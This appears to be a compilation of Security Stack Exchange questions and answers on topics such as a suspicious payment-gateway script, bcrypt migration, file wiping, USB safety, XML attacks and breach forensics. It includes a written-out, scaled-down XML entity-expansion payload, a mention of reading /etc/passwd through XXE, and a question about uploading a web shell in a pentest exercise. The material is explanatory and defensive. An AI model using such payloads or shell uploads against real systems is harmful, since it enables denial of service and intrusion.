102,894
I have a freelance client that wants me to integrate a payment gateway into their WooCommerce site, but I am increasingly concerned about their choice of provider and the project as a whole. The Issues Against my advice, the client has selected the gateway provider. The provider is a far eastern one that I have never heard of before called Payforasia. The first warning flag is the fact that the English and Chinese (I think it is Chinese) versions of their website don't appear to load images correctly. I was provided documentation for the gateway API as a PDF and a simple PHP demo. They also gave me a login to the merchant front-end so I could monitor my test transactions. All fairly normal. I ran the demo on my localhost and managed to connect to the payment gateway but got a failure error response. The error was not listed in the documentation; in fact, the possible errors list goes from 0001 to 0067. I was getting error 0068. The second warning flag. When I contacted the provider, through my client, to ask for up-to-date docs and for advice on the error, I was told that the docs are the latest and that the office was closed for over a week due to a national holiday (!?!?!). They finally got back to me today and said the error was "probably" due to them not whitelisting the server IP and that they had resolved that now. I still get the same error. While waiting for them to come back to me on that, I started digging into the demo code and rereading their documentation to see if I had missed something obvious. I noticed this line in their docs: csid String 100 Yes Capture the value through http://cm.js.dl.saferconnectdirect.com/csid.js Since the original testing, and while waiting for them to come off their week-long national holiday, I had applied an SSL certificate to my client's site, and obviously the browser wouldn't load the insecure connection to the JavaScript. The URL to this is in the demo, but right at the bottom, after a huge number of returns between it and the demo form markup. Another flag waves at me. It turns out, after trying the protocol-agnostic URL and HTTPS, that the csid.js is not available over a secure connection. So I copied the JS to the server and amended the link in the markup. This is where the flag waving really starts going mental. The script populates the CSID field with my user-agent string, my screen resolution, origin server and hashed data. It also, more worryingly, adds an iframe that appears to be a tracking image or something similar. The iframe fires off six strange connections using the wss:// protocol to localhost. I will admit at this point I panicked and came here to ask for advice. The JS is minified and appears to have a PHP eval() in it and what looks like encoded characters. I don't know how to decode this and I'm unsure if it is safe to continue digging further into the code. My Questions I need some advice. Am I being overly paranoid or do I have a genuine concern? Is it normal for a gateway provider to obfuscate their code like this? Should I advise my client to immediately change supplier? Should I walk away and chalk it up to experience? Any advice, suggestions or comments on this will be hugely appreciated. Sorry if my question is rambling and a bit long, I wanted to get as much background in as possible. Update After all the excellent advice, I just wanted to give you all a quick update. I brought up a lot of my concerns with my client, who did not react in the way I expected.
I was accused of deliberately dragging my feet, inventing problems and being incompetent, and received less-than-professional questions as to my parentage. Relations between me and my client have definitely frosted. They insisted that I implement the gateway without SSL on the site AT ALL. When I refused and invited them to find another developer, they backed down almost straight away and became a little more cordial, although I have not yet received an apology. Since then they have revealed that the gateway provider had whitelisted the wrong IP, which was why I was still receiving the mysterious 0068 error. The gateway provider tried to pin that one on me until I provided Skype logs to the contrary. My client won't let me speak to the gateway provider directly, so the IP address was garbled at some point between them. With regards to the insecure JavaScript, my client suddenly provided me, late yesterday, with this URL: https://online-safest.com/pub/csid.js . They haven't provided any further documentation or said where they got this script from. I have not tested this script yet. I'm not sure I want to continue with it, so I've been dragging my feet. I need to have a think about it today. I will accept an answer tomorrow; unfortunately I can't accept multiple answers even though I have used the content of several. Update 2 Just a final update. I completed this project for my client, but I fear my relationship with them is now irrecoverably damaged. They insisted that I put the gateway live without any testing beyond the fact that a single test transaction went through. I've told them that for any post-live issues they will need to find another developer, as they have gone live without testing and forfeited my normal support period. You could argue that it is unethical for me to release code into the wild that could be buggy and dangerous for end users, however I saw no other way to easily exit the contract. I have given them full access to the private Git repo containing the source, which contains all the documented interaction between me and the client. Any future developer should be able to view it and make a decision from there. I further discovered that they have actually sub-contracted the job to me. All in all it is a project I am glad to be rid of.
Am I being overly paranoid or do I have a genuine concern? You have a genuine concern. Something is not right here. Is it normal for a gateway provider to obfuscate their code like this? Obfuscation is not, all by itself, abnormal. However, at the point they're trying to open localhost connections to RDP, VNC, and other ports, that's not obfuscation, that's completely inappropriate and malicious. Should I advise my client to immediately change supplier? I would advise your client that the code provided for integration appears to be malicious and that you cannot assume the supplier is either a) legitimate or b) capable of securing their business (and by extension, your client's). In addition, the supplier does not appear to integrate properly into a secure purchasing environment (the http:-only js link), which calls into question their appropriateness even if legitimate. As per @JaimeCastells's comment to the question, there is no "payforasia" service provider listed at http://www.visa.com/splisting/searchGrsp.do . That could mean they're doing business under that name but are certified under a different name, or it could mean they're a "Level 2 Service Provider". Neither of those options is reassuring, quite frankly. Should I walk away and chalk it up to experience? If the client wants to continue with this supplier, I would definitely consider walking away. You can't make the client do the right thing, but you can choose not to be the one doing the wrong thing for them. JavaScript analysis The intent of the obfuscated JavaScript seems important. I've tried to untangle what's happening in the JavaScript, and I'll link to readable partially de-obfuscated copies in this section. Overall, my impression is that the level of obfuscation used in these scripts exceeds what is commercially reasonable and becomes suspicious as a result. The limited inferences I can draw about what it does are not in line with normal payments processing. Lacking better information, I presume this is malicious JavaScript. Here are the files I'm looking at, should you wish to explore the same question. These files have been run through the Online Javascript Beautifier and I've also used the Online Javascript Editor to pick apart bits of what the scripts do. You can see that even with the basic de-obfuscation applied, there's still a lot of obfuscation in place - check.js is full of arrays of integers which get processed by the code, and which are presumably more text or code to be executed. There are at least four scripts involved: csid.js tags.js check.js checkcid.js It's clear, for example, that the six ports the OP saw getting connection attempts are hardwired into check.js: td_0a = ['REF:63333', 'VNC:5900', 'VNC:5901', 'VNC:5902', 'VNC:5903', 'RDP:3389']; I will continue to poke at them, and may pastebin some copies, but I think it's reasonable to be distrustful of this code at this point.
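If you would rather not paste a suspicious script into an online beautifier, the same kind of first-pass de-obfuscation can be done locally. Below is a minimal sketch using the third-party jsbeautifier Python package (pip install jsbeautifier); the file names are illustrative assumptions, and this only reformats the code - it does not decode the integer arrays or any eval()'d payloads.

import jsbeautifier

# Read the minified/obfuscated script exactly as it was delivered.
with open("csid.js", "r", encoding="utf-8") as f:
    minified = f.read()

# Reformat it into something readable; this does not change its behaviour.
readable = jsbeautifier.beautify(minified)

with open("csid.deobfuscated.js", "w", encoding="utf-8") as f:
    f.write(readable)

print("Wrote csid.deobfuscated.js; inspect it in an editor, never in a browser.")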
{ "source": [ "https://security.stackexchange.com/questions/102894", "https://security.stackexchange.com", "https://security.stackexchange.com/users/89402/" ] }
103,034
I've some stuff encrypted with GnuPG using gpg -e . When I decrypt them, the system does not ask for the passphrase; it decrypts them straight away. Does it store the secret key somewhere and use it (I also stored my secret key in the GnuPG key chain; does it use that)? How can I force the system to ask for the passphrase every time?
Does it store the secret key somewhere and use it (I also stored my secret key in the GnuPG key chain; does it use that)? GnuPG only uses keys from your key chain, so it must be in there to use it. How can I force the system to ask for the passphrase every time? Old versions of GnuPG use the gpg-agent, which caches the passphrase for a given time. Use the option --no-use-agent or add a line no-use-agent to ~/.gnupg/gpg.conf to prevent using the agent. For newer versions (v2.1+), disable passphrase caching for the agent by creating ~/.gnupg/gpg-agent.conf and adding the following lines: default-cache-ttl 1 max-cache-ttl 1 Restart the agent with: echo RELOADAGENT | gpg-connect-agent
{ "source": [ "https://security.stackexchange.com/questions/103034", "https://security.stackexchange.com", "https://security.stackexchange.com/users/89099/" ] }
103,064
My company has a policy that files have to be shredded after they've been read. They provide a tool, shred.exe, that I run on the file; it overwrites the file with garbage in the file system before unlinking it. Today I forgot to do that and I wonder what to do now. How do I shred a file that's already been unlinked? I'm using the Windows 7 operating system. So far I have tried creating thousands of tiny files ranging from 1 MB to 200 MB and just copying them a hundred times in the file system, but it takes way too long. Any other suggestions to do this more quickly?
First of all (just to be on the safe side) verify the file isn't in the Recycle Bin. If it is, choose Restore and of course shred the recovered file (or maybe you can shred it while it is inside the Recycle Bin). If the file has been "truly deleted", recover it using an undelete tool such as Piriform's Recuva, then shred it for good. Note (suggested by Chris H): deletion under most filesystems is lazy, i.e. the space occupied by the file is simply marked as reusable. Until it is actually reused, the old data is still there and may be recovered. Undelete tools can work in two ways: they can mark that space as occupied again, or they can read the space and make a copy elsewhere. You want the first kind of undeletion, since you want to make the original space accessible to the shredder and destroy it -- not make a copy that will leave the original space still maybe recoverable again and again. A deleted file might be recoverable using Windows Shadow Copy, which has been available since XP and is enabled by default in Windows 7+. In an earlier edit I wrote 'chances are that it is disabled'. I should have written "on an unrelated note, ensure that it is disabled". VSS will not help you to shred a deleted file, since (as Chris H noticed) it will actually make another copy. You do not recover the original file space, which remains unshredded. For this reason, your company's IT admins should have disabled VSS on your computer. Otherwise, any "shredded" file may actually have several unshredded and recoverable copies lying around the disk. DIY overwrite However: a newly copied file (with VSS disabled) would be at the beginning of the free space area. If you copy a couple of thousand files having the same size as the filesystem cluster size (or 1 KB if you're in doubt), you should be pretty sure that the file has been made unrecoverable even if it has not been "officially shredded". "Official" overwrite tools If you really want to be sure, use a tool such as SDelete and tell it to wipe the disk's free space (be careful - not the allocated space!). Or you can use Piriform's CCleaner and do the same thing from the Tools menu. Another tool I just discovered by chance, and which is recommended by Gutmann himself, is Eraser. Unless the disk is carefully examined with a scanning electron microscope, nobody's ever going to be able to tell whether the file was shredded with the mandated tool or not before becoming totally irretrievable. If you use SDelete or the like in so-called "secure" mode (aka Gutmann erase), even a scanning electron microscope will be none the wiser. Mandatory point: Gutmann erase is serious overkill even in Gutmann's own opinion. (The above may of course not apply if the company shred executable keeps and possibly transmits a record of the MD5 of every file it shreds.)
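To illustrate the "DIY overwrite" idea above, here is a minimal sketch in Python that fills the volume's free space with random data and then removes the filler files. The scratch directory and chunk size are illustrative assumptions; this is not a replacement for a dedicated tool such as SDelete or Eraser, and on an SSD wear levelling may still leave old copies of blocks behind.

import os

FILLER_DIR = r"C:\wipe_tmp"   # assumed scratch directory on the same volume as the deleted file
CHUNK = 64 * 1024 * 1024      # write 64 MiB of random data per filler file

def fill_free_space(directory):
    os.makedirs(directory, exist_ok=True)
    index = 0
    try:
        while True:
            path = os.path.join(directory, "filler_%05d.bin" % index)
            with open(path, "wb") as f:
                f.write(os.urandom(CHUNK))   # random garbage overwrites reusable blocks
                f.flush()
                os.fsync(f.fileno())         # force it onto the disk, not just the cache
            index += 1
    except OSError:
        pass  # the volume is (nearly) full -- stop writing

def cleanup(directory):
    for name in os.listdir(directory):
        os.remove(os.path.join(directory, name))
    os.rmdir(directory)

if __name__ == "__main__":
    fill_free_space(FILLER_DIR)
    cleanup(FILLER_DIR)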
{ "source": [ "https://security.stackexchange.com/questions/103064", "https://security.stackexchange.com", "https://security.stackexchange.com/users/57387/" ] }
103,088
Suppose I found a USB memory stick lying around, and wanted to examine its contents in an attempt to locate its rightful owner. Considering that USB sticks might actually be something altogether more malicious than a mass storage device , is there any way I can do so safely? Is an electrical-isolation "condom" possible? Is there a way to manually load USB drivers in Linux / Windows / OS X so as to ensure that it won't treat the device as anything other than USB mass storage? After all, despite all the fear-mongering, it's still overwhelmingly more likely that what appears to be a misplaced memory stick actually is just a memory stick. Follow-up question: what measures do/can photo-printing kiosks take to guard against these kinds of attacks?
The USB-killer wouldn't kill your PC if you connected it through an opto-isolated hub. They do exist (search: "opto-isolated USB hub"), but as I've never used one myself I'm not going to recommend a specific model. They're not cheap though. Once you've dealt with the hardware aspect, you're then reduced to a more common problem. You've probably got more expert advice in other answers already, but my take is to unplug the hard drive (and all other writable storage) of a PC and boot it off a live CD or live USB stick (one which doesn't auto-run the contents of USB sticks, of course). That's because it's maximum return for the effort, given where I'm starting from. It would be sensible, if you were going to make a habit of this, to set even your live CD up to not auto-mount and not auto-install hardware, and to unplug the machine from the network. Booting with the suspect stick in place would also be a bad idea, in case it's bootable, but also because you may want to have access to event logs when you've just plugged it in.
{ "source": [ "https://security.stackexchange.com/questions/103088", "https://security.stackexchange.com", "https://security.stackexchange.com/users/27444/" ] }
103,233
If I sign a very short message (0 or 1) with my private key (and the receiving side verifies the signature using the public key), is this less secure than signing and sending a sufficiently long message?
The problem is not one of forging the signature, but of the meaning of the message . What is signed is not the message, but a hash of the message. The hash is always the same length. A message consisting of a single bit or byte can be hashed, so it can be signed, so it can be proved that your key signed it. But even if it can be proved, what does the message mean? If it is the answer to a "yes/no" question, you need to still include some reference to which question is being replied to, to prevent replay attacks . Alice: Is your name h22? Bob: Signed(Yes) (Eve overhears) Alice: Are you guilty of subversive activity? Eve: Signed(Yes) (Alice thinks this is from Bob) Therefore each answer needs to include some sort of reference to the question, so the answer cannot be reused. You can do this by giving each question a "number used only once" (nonce) which you include in the reply. Alice: Q1: Is your name h22? Bob: Signed(Q1:Yes) (Eve overhears) Alice: Q2: Are you guilty of subversive activity? Eve: Signed(Q1:Yes) (Alice is not fooled - this is the wrong question number, so it is a replay attack) Bob: Signed(Q2:No) (Alice knows this is really Bob now) Of course really Alice needs to sign her questions too. Otherwise Mallory could trick Bob into answering different questions. Alice: Q1: Is your name h22? Bob: Signed(Q1:Yes) Alice: Q2: Are you guilty of subversive activity? (Intercepted by Mallory) Mallory: Q2: Are you known as h? Bob: Signed(Q2:Yes) (Answering Mallory's question, but Alice thinks this is a reply to her). So it's important that the whole conversation is protected. In reality this generally means including the time and date as part of the message which is signed, as well as signing messages in both directions, and protecting against replay using a nonce.
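To make the nonce idea concrete, here is a minimal sketch in Python using the third-party cryptography package (pip install cryptography). The message layout (question, nonce and answer joined with a separator) is an illustrative assumption, not a standard protocol; a real design would also sign Alice's questions and include timestamps, as described above.

import os
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Bob's long-term signing key pair.
bob_private = Ed25519PrivateKey.generate()
bob_public = bob_private.public_key()

# Alice builds a question with a fresh nonce ("number used only once").
question = b"Q1: Is your name h22?"
nonce = os.urandom(16)

# Bob signs the question, the nonce and his answer together, so the signature
# cannot be replayed as the answer to a different question.
answer = b"Yes"
blob = question + b"|" + nonce + b"|" + answer
signature = bob_private.sign(blob)

# Alice verifies against the exact question/nonce/answer she expects;
# verify() raises InvalidSignature if anything was altered or replayed.
bob_public.verify(signature, blob)
print("Signature valid: the answer is bound to this question and nonce.")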
{ "source": [ "https://security.stackexchange.com/questions/103233", "https://security.stackexchange.com", "https://security.stackexchange.com/users/45858/" ] }
103,393
I'm working on improving a CMS where the current implementation of storing passwords is just sha1(password) . I explained to my boss that doing it that way is incredibly insecure, and told him that we should switch to bcrypt, and he agreed. My plan was to just run all the existing hashes through bcrypt and store those in the password field, and then use the following pseudo-code to check the password: correctPassword = bcrypt_verify(password, storedHash) or bcrypt_verify(sha1(password), storedHash) . This way, new users, or users who change their passwords, will get "real" bcrypt hashes, while existing users won't all have to change their passwords. Are there any disadvantages to doing this? While it would probably be ideal to ask all users to choose a new password, do we lose much in the way of security by doing this? I was thinking that even if an attacker got access to both the database and the code, cracking won't be substantially faster even if the majority of the "input" to bcrypt was a 40-character hex string, since the slow part ( bcrypt_verify() ) still has to be invoked for each password attempt on each user.
Actually this is a good way to protect the otherwise insecurely stored passwords. There is one weak point in this scheme though, which can be overcome easily by marking old hashes, so I would prefer this solution: if (checkIfDoubleHash(storedHash)) correctPassword = bcrypt_verify(sha1(password), storedHash) else correctPassword = bcrypt_verify(password, storedHash) Imagine an attacker getting hold of an old backup. He would see the SHA-1 hashes, and could use them directly as passwords if you test with bcrypt_verify(...) or bcrypt_verify(sha1(...)) . Most bcrypt libraries add a mark of the used algorithm themselves, so it is not a problem if you add your own "double hash mark", but of course you can also use a separate database field for this: $2y$10$nOUIs5kJ7naTuTFkBy1veuK0kSxUFXfuaOKdOKf9xYT0KKIGSJwFa | hash-algorithm = 2y = BCrypt
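A rough sketch of this scheme in Python, using the third-party bcrypt package (pip install bcrypt). The is_wrapped_sha1 flag stands in for the "double hash mark" described above and is an assumption about how you store it (it could equally be a separate database column); it also assumes the legacy column stores the SHA-1 digest as a lowercase hex string, as PHP's sha1() produces.

import hashlib
import bcrypt

def wrap_legacy_hash(sha1_hex):
    # One-off migration step: wrap an existing SHA-1 hex digest in bcrypt.
    return bcrypt.hashpw(sha1_hex.encode("ascii"), bcrypt.gensalt())

def verify(password, stored_hash, is_wrapped_sha1):
    if is_wrapped_sha1:
        # Legacy entry: stored_hash = bcrypt(sha1(password))
        candidate = hashlib.sha1(password.encode("utf-8")).hexdigest().encode("ascii")
    else:
        # New entry: stored_hash = bcrypt(password)
        candidate = password.encode("utf-8")
    return bcrypt.checkpw(candidate, stored_hash)

def rehash_on_login(password):
    # After a legacy user logs in successfully, store this and clear the flag
    # so the SHA-1 layer gradually disappears from the database.
    return bcrypt.hashpw(password.encode("utf-8"), bcrypt.gensalt())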
{ "source": [ "https://security.stackexchange.com/questions/103393", "https://security.stackexchange.com", "https://security.stackexchange.com/users/50271/" ] }
103,524
Many companies have intranet websites that are not reachable via the internet. Usually they just use a self-signed certificate, which creates a bad habit for users, since they get used to just pressing OK on invalid certificate warnings. Question: How can they generate a certificate for their HTTPS websites using Let's Encrypt? Do the LTS web browsers have Let's Encrypt as a CA? Isn't it a privacy issue that private domain names, like my-company-private-intranet-site.com, could be leaked?
Let's Encrypt can only issue certificates for valid DNS names. So if your intranet uses a made-up domain name like intranet.mycompany.local then it won't work. If you have a real DNS name like intranet.mycompany.com (even if it doesn't resolve externally to your intranet), then you can use Let's Encrypt to issue certificates for it. If the domain does resolve externally to a server that can respond on port 80 (which need not actually be part of your intranet, if you have split-horizon DNS ), you can use the http-01 challenge. Alternatively, you can use the dns-01 challenge (fully supported in Certbot 0.10.0 and later, as well as other clients such as dehydrated , getssl and acme.sh ). Since this challenge works by provisioning DNS TXT records, you don't ever need to point an A record at a public IP address. So your intranet does not need to be reachable from the Internet, but your domain name does need to exist in the public DNS under your control. Let's Encrypt - and publicly trusted certificate authorities in general, due to Chrome's requirements - submit all issued certificates to public certificate transparency logs. As such, you should not expect your intranet (sub)domain name to remain secret if you obtain a certificate for it. Your intranet's security shouldn't be dependent on keeping its domain name secret anyway.
{ "source": [ "https://security.stackexchange.com/questions/103524", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76582/" ] }
103,540
Within our local education IT system, all websites served via HTTPS are blocked, except a select few websites which are 'authorized'. This results in some websites being unable to function properly (such as Google's jQuery libraries, which are served via HTTPS). I also remember reading an article a couple of years ago which said that HTTPS can cause problems with censorship filters/proxies, as HTTPS connections cannot be intercepted and the page contents searched for blocked content (I haven't seen this behavior in many filters, but one product that does this is Censornet). Disregarding educational use, I have also found that a few shared WiFi hotspots engage in this behavior (and these are unfiltered for the most part). For example, I was travelling via Gatwick Airport (UK) last year and all HTTPS sites were blocked on the official 'Gatwick Airport WiFi' network. Other than for filtering purposes, is there any reason to block HTTPS? HTTPS is paramount for websites that deal with private information (passwords, emails, etc.), so I can't really see a good reason for blocking it.
The most probable reasons for blocking encrypted communications (i.e. HTTPS), include: Government & security related surveillance. It's easier for officials to intercept potential threats if they are in plain text. This is probably why the WiFi at the airport blocked HTTPS access. Hacking / Man in the Middle Attacks. If your communications are not encrypted, plain text usernames and passwords can be intercepted by someone operating the hot spot. You often see these open WiFi hotspots in locations where the public is likely to login, like airports and coffee shops. If they were simply filtering your traffic (blocking certain websites), the most direct way to do that is to simply block IP addresses or domain names. Blocking HTTPS most likely was used to ensure they could listen into your network traffic.
{ "source": [ "https://security.stackexchange.com/questions/103540", "https://security.stackexchange.com", "https://security.stackexchange.com/users/49573/" ] }
103,666
Could a VPS provider like DigitalOcean have access to the content of their users? In their terms of service they do not mention anything related to this question, but could they theoretically have access (e.g., via a backdoor)? Apart from a possible hack, how could I assure my clients that their content is only known by me, even if their data is not on my server?
When you host your data on other people's servers, then these people have full access to it. With a virtualized server, the data is written to the hard drive of the host system. The server administrators could look at that hard drive image at any time and thus get access to the data of your users. They can also monitor the network traffic. You could prevent access to the hard drive image by using full disk encryption. When the virtual machine encrypts all the data it writes on its virtual hard drive, that data is also encrypted when written on the physical hard drive of the host. To prevent monitoring of network traffic, you could make sure all traffic - both administrative and user traffic - is strongly encrypted. But with some criminal energy, they can still monitor your data. When you reboot your machine, you will have to enter the disk encryption password through the remote administration console. That console is under their control, so they could use that to log your disk password. They can make a snapshot of your VM at any time, which dumps the whole RAM content to disk. This gives them access to all data currently in memory, including the decryption key of the virtual disk. When they control the VM hypervisor, they also control all the computations the virtual machines make. It's not easy to do, but it is theoretically possible to use this to break any cryptography which happens on it. Solution: Host your servers on your own premises where you have full access. But will DigitalOcean do that? This is what their privacy policy says: Server Data DigitalOcean does not have access to its users’ server data. The backend is locked away from the users’ support staff and only engineering staff has access to the physical servers where users’ virtual machines reside. DigitalOcean does not store users’ passwords or private SSH keys. DigitalOcean also does not request user login information to their servers. DigitalOcean does not review or audit any user data. This is what they say. Can you trust their words? Your decision to make. By the way, their Law Enforcement Guide might also be worth reading in this regard. It describes what information they suddenly do have access to when pressed by government officials.
{ "source": [ "https://security.stackexchange.com/questions/103666", "https://security.stackexchange.com", "https://security.stackexchange.com/users/84797/" ] }
103,671
So I have this challenge in pentesting to get a shell on a vulnerable web app. I am an authenticated user and I know that the vulnerable app is kcfinder-2.51, which is a plugin for ckeditor_3.6.4. I am trying to upload a weevely shell, but the problem is that the server is configured to redirect everything to a 404 page if it's a directory or a wrong file. Another problem is that the upload directory is unique to every user; even a non-authenticated user has a different upload directory. How do I know which upload directory the shell is uploaded to? And if I upload a .htaccess file to that directory, can I enable directory listing or change the config?
{ "source": [ "https://security.stackexchange.com/questions/103671", "https://security.stackexchange.com", "https://security.stackexchange.com/users/55851/" ] }
103,672
Suppose, for example, that I have Magento eCommerce and WordPress installed on the same server. Each has its own database with a different database username/password, and both have different admin login details. If there were a serious vulnerability in a Magento plugin that allowed Magento to be attacked, could that vulnerability be so bad that an attacker could use it to attack WordPress as well?
If the Magento vulnerability led to a shell, then that shell could be used to get root access by a privilege escalation vulnerability. When that happens, the attacker has complete control over the system.
{ "source": [ "https://security.stackexchange.com/questions/103672", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
103,712
A colleague sent a .xml file to me earlier today, which was blocked by Outlook. As we were discussing the workaround (put it in a .zip), we got to wondering why .xml files are blocked. My colleague reckons it's because the browser is the default renderer for .xml files and there's possibly an attack vector in passing an HTML file with an .xml extension, but I tried this in Firefox and was shown the document tree as a bare XML file. Does anyone have any examples where an XML file could be added as an attachment to do something malicious (or at least, more so than any other random attachment that isn't blocked)?
Possible XML based attacks are: XML bomb (aka the Billion Laughs attack). This is an XML file that uses nested custom entity definitions to attack a vulnerable XML parser. The XML bomb has a very small size on disk, but expands up to a huge size when parsed, potentially exhausting the available memory on the victim's device. External entity that may not return. In this case the XML document defines an external entity at a URL that either does not respond, or responds slowly. This could cause a DoS on the victim's device. External entity that exposes sensitive information. This is similar to point 2 (and is explained at the same link), but in this case the external entity attempts to expose sensitive local files (e.g. file:///etc/passwd ). Whether any of these attacks could succeed depends on the XML parser installed on the local machine. I think applications like newer versions of IE, Firefox etc. protect against these, but older versions or some custom software might be vulnerable.
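As a concrete illustration of the first point, here is a minimal sketch in Python of a deliberately scaled-down entity-expansion payload, rejected using the third-party defusedxml package (pip install defusedxml), which refuses entity declarations outright. The entity names and nesting depth are illustrative; a real bomb nests many more levels.

import defusedxml.ElementTree as ET

# A scaled-down "billion laughs" payload: &c; expands to 100 copies of "lol".
BOMB = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE bomb ['
    '  <!ENTITY a "lol">'
    '  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">'
    '  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">'
    ']>'
    '<bomb>&c;</bomb>'
)

try:
    ET.fromstring(BOMB)
except Exception as exc:  # defusedxml raises EntitiesForbidden for entity declarations
    print("Rejected suspicious XML:", type(exc).__name__)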
{ "source": [ "https://security.stackexchange.com/questions/103712", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90239/" ] }
103,731
The NSA has had a large hand in the design of at least two significant encryption standards: the Data Encryption Standard, and its successor, the Advanced Encryption Standard. Because of their involvement, there is much speculation about backdoors. Setting aside our tinfoil hats for a moment, have there been any official statements by the NSA or other involved organizations as to why the NSA has had a part in the encryption standards? Why is it in their interest to support the encryption of data? Especially when the usage of the encryption standards can't be enforced; the algorithms can be (and are) used by countries and corporations outside of the United States.
The NSA is a composite organization, that comprises several sub-entities called "directorates" with various scopes and goals. The NSA, as a whole, is supposed to have a multitude of roles; its signal intelligence role (often abbreviated as SIGINT, i.e. spying) is the one most people talk about, and is supposed to be handled by the SID (as "Signal Intelligence Directorate"). However, NSA is also supposed to ensure the information safety of US interests, and as such should help federal organizations and also big US private companies apply proper encryption, where encryption is needed. This defensive role falls largely within the scope of the IAD (Information Assurance Directorate). It is true that within the NSA, the balance of power substantially shifted towards SID after September 2001, but they still maintain a non-negligible defensive role. In any case, both DES and AES were standardized before that date. In the USA, federal standards are edited and published by a specific agency called NIST . NIST is not the NSA. However, when the NIST people deal with some cryptographic algorithms, they like to get inputs from the NSA because that's where the US government keeps its crypto-aware thinkers. The NSA itself likes to be consulted by NIST because they want to keep track of published cryptographic algorithms, both for attacking and defending (they want to know what algorithms they will be faced with when trying to eavesdrop, and they also want to know what algorithms they should advise big US companies to use to thwart foreign evildoers). On that subject, you may want to read this article which is about elliptic curves and "post-quantum crypto", and what the NSA says and thinks about it. It highlights that NSA is, first and foremost, a big governmental organization , and thus tends to behave like big governmental organizations do; in particular, some or even most of its actions are related to its own internal politics. There is quite a gap between "being involved" and "having a part". According to Don Coppersmith (one of the DES designers), the NSA, at some point, interacted with the IBM team, under the avowed goal to strengthen the algorithm. The NSA, at that time, still employed a substantial proportion of available cryptographers (this is no longer true), and had some knowledge of an as yet unpublished attack method, namely differential cryptanalysis . The NSA wanted to make sure that the new algorithm would resist such attacks. It turned out that the IBM team had also conceived the idea of differential cryptanalysis, and had already strengthened their design against it. So the NSA involvement reduced to asking the IBM researchers not to publish their findings. (As Leibniz would have put it, scientific discoveries are floating in the air, and when you have a new idea, chances are that several other people have the same idea at the same time. It is thus pretty hard to keep ahead of the rest of the World in scientific areas.) For the AES standardization process, NIST deliberately organized the whole competition as being very open; submitters were encouraged and even requested to publish all design criteria of their candidates. 
While one cannot logically preclude the possibility of bribery to inject a backdoor into one candidate, because it is very hard to prove a negative (that's the point about conspiracy theories: they cannot be rationally denied because they are beyond logic), most candidates, including the one finally chosen (Rijndael), had all their design elements fully explained, with no undisclosed dark areas. Thus, NSA input in that matter was mostly a statement that they found nothing wrong with any candidate. (Cryptographers are also human beings and, as such, may occasionally indulge in gossip. At that time, the gut feeling of most of them was that if there was an NSA-sponsored candidate, then it was MARS, mostly because that was Don Coppersmith and IBM again. In any case, that algorithm was not very popular because it was overly complex and hard to fathom. Rijndael's structure was a lot simpler.)
{ "source": [ "https://security.stackexchange.com/questions/103731", "https://security.stackexchange.com", "https://security.stackexchange.com/users/38377/" ] }
103,805
In the UK, the company TalkTalk was recently hacked. It was later discovered, after 'investigation', that the hack was not as serious as it could have been (and less serious than expected). I'm wondering: how do organizations (not necessarily TalkTalk -- that's just what prompted me to ask) check what has been hacked? I'm sure there are many ways, but what are the 'main' ones?
In a word: Forensics . Computer forensics is the art of examining a system and determining what happened upon it previously. The examination of file and memory artifacts, especially file timelines, can paint a very clear picture of what the attacker did, when they did it, and what they took. Just as an example - given a memory dump of a Windows system, it is possible to extract not only the command lines typed by an attacker, but also the output that they saw as a result of running those commands . Pretty useful in determining impact, eh? Depending on the freshness of the compromise, it's possible to tell quite a lot about what happened. @AleksandrDubinsky suggested that it would be useful to outline the various Computer Forensic fields and techniques, which I'm happy to do for you. They include, but are not limited to, the following (I'm going to use my rough terms; they aren't official or comprehensive): Log/Monitor Forensics : The use of 'external' data such as centralized logs, firewall logs, packet captures, and IDS hits straddles the line between "Detection" and "Forensics". Some of the data, like logs (even centralized) cannot be trusted to be complete or even truthful, as attackers can filter it or inject it once they have control of the system. Off-the-system packet logging tools like the firewall, IDS, or packet recorders (such as (formerly) NetWitness ) are unlikely to be tampered with, but contain only a limited amount information; usually just a record of IP conversations and sometimes signatures (such as HTTP URLs) associated with malicious activity. Unless an unencrypted network connection was used in the compromise, these tools are rarely able to detail the activity during a compromise, and so (going back to the original question) don't "check what has been hacked." On the other hand, if an unencrypted connection (ftp) was used to exfiltrate data out , and full packets were recorded, then it's possible to know exactly what data the attacker ran away with. Live Forensics : More properly part of Incident Response, so-called "Live" forensics involves logging into the system and looking around. Investigators may enumerate processes, look in applications (e.g. browser history), and explore the file system looking for indications of what happened. Again, this is usually designed to verify a compromise happened, and not to determine the extent of a compromise, since a compromised system is capable of hiding files, processes, network connections, really anything it wants to. The plus side is that it allows access to memory-resident things (processes, open network connections) that aren't available once you shut the system down to image the disk (but, again, the system may be lying, if it's compromised!) Filesystem Forensics : Once a copy of the disk has been made, it can be mounted on a clean system and explored, removing any chance of the the compromised operating system "lying" about what files are in place. Tools exist to build timelines using the variety of timestamps and other metadata available, incorporating file data, registry data (on Windows), even application data (e.g. browser history). It's not just file write times that are used; file read times can indicate which files have been viewed and also which programs have been executed (and when). Suspicious files can be run through clean antivirus checkers, signatures made and submitted, executables loaded into debuggers and explored, "strings" used to search for keywords. 
On Unix, "history" files - if not turned off by the attacker - may detail the commands the attacker entered. On Windows, the Shadow Copy Service may provide snapshots of past activity that has since been cleaned up. This is the step most commonly used to determine the scope and extent of a compromise, and to determine what data may or may not have been accessed and/or exfiltrated. This is the best answer to how we "check what has been hacked." Disk Forensics : Deleted files disappear from the filesystem, but not from the disk. Also, clever attackers may hide their files in the "slack space" of existing files. These things can only be found by examining the raw disk bytes, and tools like The Sleuth Kit exist to rip that raw data apart and determine what it means about the past. If there was a .bash_history file, and the attacker deleted it as his last step before logging out, then that file may still exist as disk blocks, and be recoverable. Likewise, attack tools that were downloaded and temporary data files that were exfiltrated can help determine the extent of the compromise. Memory Forensics : If the investigator can get there soon enough, and get a snapshot of the memory of the system involved, then they can thoroughly plumb the depths of the compromise. An attacker must compromise the kernel to hide from programs, but there's no way to hide what's been done if a true image of kernel memory can be made. And just as the disk blocks contain data that has since been removed from the filesystem, the memory dump contains data that was in memory in the past (such as command line history and output!) that has not yet been overwritten... and most data is not overwritten 